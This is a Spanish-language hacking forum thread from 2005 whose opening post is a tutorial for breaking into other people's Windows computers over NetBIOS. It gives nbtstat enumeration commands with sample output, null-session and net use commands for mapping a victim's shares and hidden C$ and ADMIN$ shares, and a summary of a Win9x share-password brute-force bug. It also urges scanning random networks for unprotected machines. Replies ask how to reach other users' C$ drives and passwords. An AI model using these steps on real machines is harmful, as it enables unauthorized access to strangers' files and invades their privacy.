Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 11:25:53
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Hack para newbies (Moderadores: OzX, Axus)  |  Tema: Entrar a los recursos compartidos de un pc remoto con netbios (facil y rapido) 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2 3 Ir Abajo Imprimir
Autor Tema: Entrar a los recursos compartidos de un pc remoto con netbios (facil y rapido)  (Leído 9351 veces)
[QuetZaL]
Colaborador
*****
Desconectado Desconectado

Mensajes: 401



Ver Perfil Email
« en: Noviembre 01, 2005, 02:41:47 »

ASALTO POR NETBIOS

    * ¿NETBIOS?
    * ENTRANDO POR NETBIOS
    * CRACKEANDO LOS PASSWORDS
    * MÉTODO RÁPIDO

En esta sección vamos a tratar de explicar primero qué es NETBIOS y como se puede establecer una comunicación por NETBIOS, para después, y mas importante, citar las mejores utilidades para realizar este ataque, gracias a las cuales el hack por NetBIOS se ha convertido un casi un mero trámite, hablaremos al final de algunos programillas muy nuevos que son capaces, gracias a un bug descubierto en el año 2000 por NSFOCUS, de desvelar los paswords de los recursos compartidos de cualquier windows 9x/Me no parcheado, en menos de un minuto.

 

¿NETBIOS?

NETBIOS (Network Basic Output/Input System que en español Sistema Básico de Red Entrada/Salida) es el protocolo que se encarga de compartir los archivos y las impresoras entre varios ordenadores. Tal vez habrás oído mencionar alguna vez el NETBEUI (NetBIOS Extended User Interface o Interfaz de Usuario Extendido),pues bien, es lo mismo pero NETBIOS lo desarrollaron IBM y Sytek, y NETBEUI lo desarrollo microsoft, tratando de optimizar el NETBIOS para Windows.

Es habitual oír hablar simplemente del "139" este es el puerto por el que funciona este protocolo, el 137 y el 138 también forman parte de este protocolo,

NetBIOS-ns        137       TCP / UDP        NetBIOS        Name Service

NetBIOS-dgm       138       TCP / UDP        NetBIOS        Datagram Service

NetBIOS-ssn       139       TCP / UDP        NetBIOS        Session Service

Para poder comprobar este ataque con éxito debes tener instalado el protocolo en tu PC, para ello, si tienes Windows 95 / 98 /Me debes ir a

INICIO \ CONFIGURACION \ PANEL DE CONTROL \ RED e instalar el cliente para redes Microsoft, el protocolo TCP/IP y activar "Compartir archivos e impresoras", si utilizas el Windows NT4 / 2000 / XP debes hacer lo mismo pero, en estos sistemas se hace en cada conexión a Internet por separado (sólo necesitas activarlo en aquella que vayas a utilizar para el ataque.

ENTRANDO POR NETBIOS

Lo que se explica a continuación se puede utilizar desde un windows para atacar otro windows, aunque el ataque está pesado para NT sería muy similar si quisiéramos atacar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que hoy en día existen maneras mas fáciles y rápidas de hacerlo, esta sección la he puesto sólo como curiosidad.

Una vez elegida la máquina a la que quieres entrar solo necesitas el Ms-Dos, o el Símbolo de Sistema, que para el caso es lo mismo, pues bien abres una ventana y escribes:

nbtstat -A 192.168.0.1

(si lo que conoces es la IP de la victima)

nbtstat -a nombre_del_PC

(si conoces solo su nombre)

pueden ocurrir varias cosas, si recibes:

C:\WINDOWS>nbtstat -A 192.168.0.1

Host not found.

Pues queda claro que "not found" , o no está conectado, o no comparte archivos, o no existe (mira a ver si lo escribiste bien)

Si la respuesta es:

C:\WINDOWS>nbtstat -A 192.168.0.1

NetBIOS Remote Machine Name Table

Name                     Type       Status

--------------------------------------------------------------

NAME               <00> UNIQUE      Registered

WORKGROUP          <00> GROUP      Registered

NAME               <03> UNIQUE      Registered

MAC Address = 00-00-00-00-00-00

Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene instalado, no comparte nada.

Si recibimos:

C:\WINDOWS>nbtstat -A 192.168.0.1

NetBIOS Remote Machine Name Table

Name                    Type              Status

----------------------------------------------------------------

NAME                <00> UNIQUE     Registered

WORKGROUP           <00> GROUP     Registered

NAME                <03> UNIQUE     Registered

NAME                <20> UNIQUE     Registered

WORKGROUP           <1E> GROUP      Registered

MAC Address = 00-00-00-00-00-00

En este si... la diferencia importante es el <20> que corresponde al "File Server Service" (Servicio servidor de archivos), solo los PC que tienen el <20> tienen archivos compartidos y accesibles.

El IPC$ (Inter-Process Communication) es un recurso compartido oculto estándar en una máquina NT , y es utilizado por el servidor para establecer comunicación con otros equipos.

Conectándose al IPC$ un intruso puede establecer una comunicación valida con el servidor NT. Conectándose como null, el intruso puede establecer dicha comunicación sin necesidad de introducir user:password.

Para ello se utiliza el siguiente comando:

c:\>net use \\[ip_de_la_víctima]\ipc$ "" /user:""

The command completed successfully.

Puedes ver qué comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET

C:\>net view \\192.168.0.1

recibirás algo así:

Shared resources at 192.168.0.1

Share name   Type              Used as    Comment

----------------------------------------------------

NETLOGON     Disk         Logon server share

Test         Disk

The command completed successfully.

Es posible que ocurra:

C:\>net view \\192.168.0.1

System error 5 has occurred.

Entonces primero tienes que establecer la "null session"

C:\>net use \\192.168.0.1\ipc$ "" /user:""

The command completed successfully.

Ahora el C:\>net view \\192.168.0.1

si funcionará

Para conectar a la carpeta compartida.

The command completed successfully.

Si escribes net use ahora, recibirás algo así:

Status       Local        Remote                     Network

-------------------------------------------------------------

OK           X:          \\123.123.123.123\test    Microsoft

OK                       \\123.123.123.123\test  Microsoft

The command completed successfully.

Para acceder directamente al PC solo tienes que:

*escribir en el explórer \\192.168.0.1

*INICIO / EJECUTAR y poner lo mismo \\192.168.0.1

*Botón derecho en Mis Sitios de Red > Buscar Equipos... y lo mismo 192.168.0.1

*En una ventana de símbolo de sistema escribir:

C:\>net use x: \\192.168.0.1\test

y después

C:\>dir x:

Este ataque solo funcionará si la carpeta compartida no tiene pasword.

Recuerda que un intruso no está limitado a los recursos compartidos que aparecen con el net view.

Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos para uso administrativo. Por defecto NT

crea el IPC$ y otro por cada partición (por ejemplo una máquina que tiene C, D, y E tendrá sus correspondientes C$, D$, y E$).

También hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por ejemplo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa parte del disco).
CRAKEANDO LOS PASSWORDS

----[esta parte está tomada del grupo DeepZone Digital Security]----

El 24 de agosto del 2000 NS-FOCUS -
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion - hacía pública una vulnerabilidad en la implementación del protocolo NETBIOS en todos los sistemas operativos corriendo el kernel 9x de la empresa Microsoft (tm), incluyendo el nuevo Windows ME y las versiones más avanzadas de Windows 98.

La vulnerabilidad en si misma no es más que un error de implementación a la hora de establecer la longitud del password para validarlo ante una petición NETBIOS.

Los sistemas vulnerables obtienen el número de bytes a comparar para el password del paquete que reciben del cliente.

Un usuario malicioso podría establecer la longitud del password a 1 byte intentar un ataque por fuerza bruta contra el password compartido. El número de intentos que debería realizar sería tan sólo de 256 (2 elevado a Cool.

El exploit que proporciona NS-FOCUS en su WEB modifica el cliente de samba en su versión 2.0.6 para atacar los recursos compartidos de un sistema vulnerable.

METODO RÁPIDO

Hoy en día ya no se usa todo ese método de introducir los comandos, han surgido muchas utilidades que automatizan todo el proceso.

Si no estás detrás de ningún PC en concreto, y lo que quieres es probar todas estas cosas con un PC aleatorio (por supuesto, sin ánimo de causar ningún daño) lo único que necesitas es elegir un escaneador adecuado ,es decir, de NetBIOS, o al menos un escaneador de puertos apuntando al 139, después escanear una red, y verás como empiezan a surgir muchos mas ordenadores mal protegidos, o desprotegidos de los que te imaginas.

En la sección download podrás encontrar algunos de los mejores.

            Texto escrito por CyruxNET
« Última modificación: Agosto 17, 2008, 01:51:53 por ©© » En línea
..::Zodiac::..
Si, soy un Criminal... Mi crimen Es la curiosidad...
Habitual
*****
Desconectado Desconectado

Mensajes: 354


Hacking Departament


Ver Perfil WWW
« Respuesta #1 en: Noviembre 01, 2005, 03:06:25 »

entonces como me meto a su disco c$ (q tiene compartido como oculto y por defecto)
En línea
Netzark
Visitante
« Respuesta #2 en: Noviembre 02, 2005, 09:49:45 »

Hay un programita que se llama Essential Net Tools(para windows) que escanea rangos de ip y muestra las ips de maquinas que tienen recursos compartidos, cuando encuentra una ip que los tiene sale al lado YES.

Ahora lo unico que hay que hacer es ir al explorer y poner en la barra de direcciones lo siguiente:

\\ipdelavictima

Con esto si comparte sin password, tiene las puertas abiertas.
En línea
[QuetZaL]
Colaborador
*****
Desconectado Desconectado

Mensajes: 401



Ver Perfil Email
« Respuesta #3 en: Noviembre 14, 2005, 08:20:34 »

En línea
.::MDavidMR::.
Colaborador
*****
Desconectado Desconectado

Mensajes: 487


moy.david@live.com
Ver Perfil Email
« Respuesta #4 en: Noviembre 14, 2005, 12:09:30 »

Una duda, como se cierra la conexion?
En línea

Nada es Verdad, Nada es mentira... Todo depende del cristal con que se mira...




DADE
Admin www.slotinformaticos.com
Colaborador
*****
Desconectado Desconectado

Mensajes: 832


Nada tarda tanto como aquello que no se empieza

dade_override@hotmail.com
Ver Perfil WWW
« Respuesta #5 en: Noviembre 14, 2005, 12:38:43 »

En línea


[QuetZaL]
Colaborador
*****
Desconectado Desconectado

Mensajes: 401



Ver Perfil Email
« Respuesta #6 en: Noviembre 16, 2005, 09:24:28 »

Quiere decoir cuando estas dentro como sales.Salu2

PD Se cierra cerrando la ventana lo as probado???O sino prueba a poner en el ms-dos exit.Salu2

En línea
DADE
Admin www.slotinformaticos.com
Colaborador
*****
Desconectado Desconectado

Mensajes: 832


Nada tarda tanto como aquello que no se empieza

dade_override@hotmail.com
Ver Perfil WWW
« Respuesta #7 en: Noviembre 16, 2005, 02:46:00 »

net stop Wink

Un saludo
En línea


Peruvian22
Visitante
« Respuesta #8 en: Diciembre 02, 2005, 07:48:24 »

hola amigasos que tal bueno ya hice to para entrar por netbios pero me sigue saliendo host no entontrado porque sera eso, ya tengo la ip y todo eso y ya se que comparte archivos y nada de nada bueno haber si alguien me ayuda, para esto yo estoy probando con mi hermano que vive en otro lado y estamos en eso osea yo quiero entrar a su pc y el al mio para practicar ok bueno alguna ayuda porfabor ok.. saludos
En línea
AnD~1
Recien Llegado
*
Desconectado Desconectado

Mensajes: 13


Ver Perfil
« Respuesta #9 en: Diciembre 02, 2005, 08:30:14 »

holas comunidad.. bueno mi pregunta es muy simple ya ke soy un newbie en esto .. Sad
lo ke pasa es ke kero entrar a otro pc ke esta en mi red...
el otro pc no comparte archivos pero kero intrusear por el pc...
cuando digito: net use x: \\192.168.0.1\test
me aparece: ke escriba el nombre de usuario y la password de "192.168.0.1" y me dice un error 5..
tonces kisiera saver como obtengo esa pass pls..
salu2.. Smiley
En línea
Reza
No Existe El Crimen Perfecto, Existe La Investigacin Imperfecta.
Habitual
*****
Desconectado Desconectado

Mensajes: 355


Quien No Comete Un Error, No Ah Probado Algo Nuevo


Ver Perfil
« Respuesta #10 en: Diciembre 03, 2005, 09:58:48 »

Disculpen, esto no funciona con Windows XP verdad?

Saludos.
En línea

[QuetZaL]
Colaborador
*****
Desconectado Desconectado

Mensajes: 401



Ver Perfil Email
« Respuesta #11 en: Diciembre 03, 2005, 12:57:10 »

Si funciona con window$ xp.Salu2
En línea
miscelaneus
nuestra mayor virtud no esta en no haber caido nunca... sino en levantarnos cada vez que caemos..
Colaborador
*****
Desconectado Desconectado

Mensajes: 460


keine lust


Ver Perfil Email
« Respuesta #12 en: Diciembre 09, 2005, 01:24:48 »

una duda?..

yo ingrese en una pc de este modo.. pero solo puedo ver lo que tiene en sus documentos.. no puedo navegar por su disco c..
ahy alguna forma??..

gracias.. espero sus respuestas..
En línea

aquel que tiene fe en si mismo no necesita que los demas crean en el...
i_berbeu
Colaborador
*****
Desconectado Desconectado

Mensajes: 486


Ver Perfil
« Respuesta #13 en: Diciembre 09, 2005, 04:07:05 »

si es una maquina NT tiene por defecto compartida la carpeta C$. asi que si puedes entrar en una carpeta compartida, puedes entrar en el C$. simplemente poniendo

\\host_IP\C$
En línea
miscelaneus
nuestra mayor virtud no esta en no haber caido nunca... sino en levantarnos cada vez que caemos..
Colaborador
*****
Desconectado Desconectado

Mensajes: 460


keine lust


Ver Perfil Email
« Respuesta #14 en: Diciembre 09, 2005, 11:19:07 »

esta tiene win xP como lo puedo hacer??
gracias..
En línea

aquel que tiene fe en si mismo no necesita que los demas crean en el...
edu_40000
Miembro
*****
Desconectado Desconectado

Mensajes: 85


Ver Perfil Email
« Respuesta #15 en: Diciembre 10, 2005, 04:53:05 »

En línea
Reza
No Existe El Crimen Perfecto, Existe La Investigacin Imperfecta.
Habitual
*****
Desconectado Desconectado

Mensajes: 355


Quien No Comete Un Error, No Ah Probado Algo Nuevo


Ver Perfil
« Respuesta #16 en: Diciembre 10, 2005, 10:01:12 »

En línea

i_berbeu
Colaborador
*****
Desconectado Desconectado

Mensajes: 486


Ver Perfil
« Respuesta #17 en: Diciembre 10, 2005, 11:13:38 »

vamos a ver
la ip 192.168.x.x es una ip de clase C privada. esto significas que esa ip no puede estar en ninguna maquina en INTERNET. por lo que una maquina con esa ip necesita un NAT para navegar por la web y demas

en el ejemplo ponia esa ip pero porque es la tipica que se usa en todos los ejemplos no por otra cosa.
Ademas tu date cuenta de que todo esto de netbios no te vale fuera de la red lan. o por lo menos no deberia de una manera "normal" ya que la resolucion de nombres se basa en mensajes de difusion (a menos que este configurado un servidor de nombres, cosa poco probable) y eso no pasa por un router. asi que el ejempo te vale. de hecho si tienes en tu casa un router muy posiblemente en tus equipo tengas una 192.168
En línea
Reza
No Existe El Crimen Perfecto, Existe La Investigacin Imperfecta.
Habitual
*****
Desconectado Desconectado

Mensajes: 355


Quien No Comete Un Error, No Ah Probado Algo Nuevo


Ver Perfil
« Respuesta #18 en: Diciembre 10, 2005, 11:17:49 »

En línea

edu_40000
Miembro
*****
Desconectado Desconectado

Mensajes: 85


Ver Perfil Email
« Respuesta #19 en: Diciembre 10, 2005, 11:37:12 »

En línea
i_berbeu
Colaborador
*****
Desconectado Desconectado

Mensajes: 486


Ver Perfil
« Respuesta #20 en: Diciembre 10, 2005, 06:25:37 »

En línea
Reza
No Existe El Crimen Perfecto, Existe La Investigacin Imperfecta.
Habitual
*****
Desconectado Desconectado

Mensajes: 355


Quien No Comete Un Error, No Ah Probado Algo Nuevo


Ver Perfil
« Respuesta #21 en: Diciembre 10, 2005, 08:21:57 »

Gracias por educarnos... Wink
En línea

edu_40000
Miembro
*****
Desconectado Desconectado

Mensajes: 85


Ver Perfil Email
« Respuesta #22 en: Diciembre 11, 2005, 01:54:48 »

Hola a todos otra vez.
Tengo un problema y no se poruque me ocurre se lo voy a contar.
Cuando temgo la ip de la victima y le hago ping me responde perfectamente pero cuando le pongo el comando "nbtstat -a la_ip" me pone k no a encontrado el host.
Estoy desconcertado no tengo ni idea de porque pasa Huh.
Si alguien lo sabe porfavor que me lo explique.
En línea
miscelaneus
nuestra mayor virtud no esta en no haber caido nunca... sino en levantarnos cada vez que caemos..
Colaborador
*****
Desconectado Desconectado

Mensajes: 460


keine lust


Ver Perfil Email
« Respuesta #23 en: Diciembre 12, 2005, 08:59:49 »

En línea

aquel que tiene fe en si mismo no necesita que los demas crean en el...
edu_40000
Miembro
*****
Desconectado Desconectado

Mensajes: 85


Ver Perfil Email
« Respuesta #24 en: Diciembre 12, 2005, 11:44:43 »

Primero, yo creo que si le hago ping a la ip y me responde es que esta conectado y segundo si haces nbtstat -a "ip" te muestra unos numeros los cuales si entre ellos se encuentra un 20 quiere decir que comparte archivos y si no esta no comparte
En línea
Páginas: [1] 2 3 Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Hack para newbies (Moderadores: OzX, Axus)  |  Tema: Entrar a los recursos compartidos de un pc remoto con netbios (facil y rapido) « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC